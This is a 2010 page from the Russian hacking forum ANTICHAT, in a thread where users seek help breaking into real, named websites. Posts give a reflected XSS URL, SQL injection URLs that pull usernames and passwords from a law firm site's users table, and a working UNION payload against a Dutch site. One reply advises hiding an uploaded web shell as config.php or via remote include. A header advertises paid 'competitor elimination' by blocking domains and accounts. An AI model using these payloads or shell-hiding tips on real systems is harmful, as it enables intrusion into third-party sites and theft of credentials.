УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1449 из 2438

1449

Опции темы

Поиск в этой теме

Опции просмотра

#14481

22.07.2010, 15:15

Iggy

Guest

Сообщений: n/a

Провел на форуме:
26362

Репутация: 1

Добрый день.

Вопрос по актывным XSS.

Нашел простую, пассивную:

Цитата:

Сообщение от None

http://otdih.nakubani.ru/forum/themes/?forumid=13">alert('')

Так же на этом перловском полуфоруме можно добавлять темы/сообщения от гостя;

Вот мои попытки расставить акт.xss:

Цитата:

Сообщение от None

http://otdih.nakubani.ru/forum/themes/view/?themeid=14547
http://otdih.nakubani.ru/forum/themes/view/?themeid=1188

Наверняка, я делаю что-то не правильно... Не подскажете, что именно?!

#14482

22.07.2010, 18:00

Keltos

Iron Man#2

Регистрация: 08.07.2009

Сообщений: 2,084

Провел на форуме:
3896191

Репутация: 2562

Как можно спрятать шелл

он висит на видном месте site.com/shell.php

#14483

22.07.2010, 18:04

auth_root

Новичок

Регистрация: 01.02.2010

Сообщений: 12

Провел на форуме:
52455

Репутация: 18

Помогите раскрутить или советом =)

Для НЕэкстрасенсов

http://macklaw.com/in_the_news/press_detail.asp?id=-94'

Цитата:

Сообщение от None

Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'ID = -94'''. /in_the_news/press_detail.asp, line 15

Не получается даже вывести версию.

В MsAccess, MsSQL не силен.

Если не получится то хоть обьясните почему =)

Расчитываю на вашу помощь...

#14484

22.07.2010, 18:08

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Отправить сообщение для Konqi с помощью ICQ

auth_root

http://macklaw.com/in_the_news/press_detail.asp?id=-94+union+select+1,2,3,4,5,6+from+msysaccessobjects

http://macklaw.com/in_the_news/press_detail.asp?id=-94+union+select+1,2,3,password,5,6+from+users

http://macklaw.com/in_the_news/press_detail.asp?id=-94+union+select+1,2,3,username,5,6+from+users

#14485

22.07.2010, 18:11

Yetisports

Guest

Сообщений: n/a

Провел на форуме:
27923

Репутация: 17

Помогите раскрутить скулю.

http://banken.ruilen.nl/random.php?catid=473+union+select+version()--+

а вот database() уже не показывает почему то.Пишет Unknown column 'admin_ruilen' in 'where clause' Вывод обрезанный, вроде четвертая версия.

Буду рад любым примерам, т.к. опыта маловато...

Вывод в ошибке.

#14486

22.07.2010, 18:12

d1v

Новичок

Регистрация: 21.02.2009

Сообщений: 3

Провел на форуме:
58401

Репутация: 0

Цитата:

Сообщение от Keltos

Keltos said:
Как можно спрятать шелл
он висит на видном месте site.com/shell.php

спрячь поглубже и переименуй во что-нибудь типа config.php, если всё равно боишься, что удалят сделай удалённый инклуд в странице сайта.

#14487

22.07.2010, 18:15

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

Провел на форуме:
6075534

Репутация: 2731

Отправить сообщение для mailbrush с помощью ICQ

Там двойной запрос.

Цитата:

Сообщение от None

http://banken.ruilen.nl/random.php?catid=473+union+select+concat(0x3a,user (),0x3a,database(),0x3a,version())--+

Обьяснять как работает - не буду, кто понял, тот понял

#14488

22.07.2010, 18:16

auth_root

Новичок

Регистрация: 01.02.2010

Сообщений: 12

Провел на форуме:
52455

Репутация: 18

Konqi

Огромное спасибо!

Вопрос, перебирать поля необходимо только с реально существующей в базе таблицой?

Если да, то для удобства просто, таблица

msysaccessobjects

встречается во всех бд данного типа? Или прийдется наугад подбирать? Если можно, если существуют такие, подкиньте плз. таких таблиц, как в MySQL например information_schema в пятой ветке есть везде.

#14489

22.07.2010, 18:19

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

auth_root

/thread210003.html

#14490

22.07.2010, 18:35

auth_root

Новичок

Регистрация: 01.02.2010

Сообщений: 12

Провел на форуме:
52455

Репутация: 18

Konqi

огромное тебе спасибо! =) Плюс.

Только вопрос, админку не нашел? =) Если нашел или шелл залил, не мог бы скинуть в пм? Хотелось бы конечно увидеть пошагово, какие ты проводишь манипуляции с запросами при взломе. Но это будет наглеж с моей стороны отбирать твое время. Поэтому я изучаю статейку, хотелось бы все повторить на практике, вплоть до заливки шелла.

Не тупо скопировать всё за кем то, а разобраться и понять каждый передаваемый параметр...

Страница 1449 из 2438

1449

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход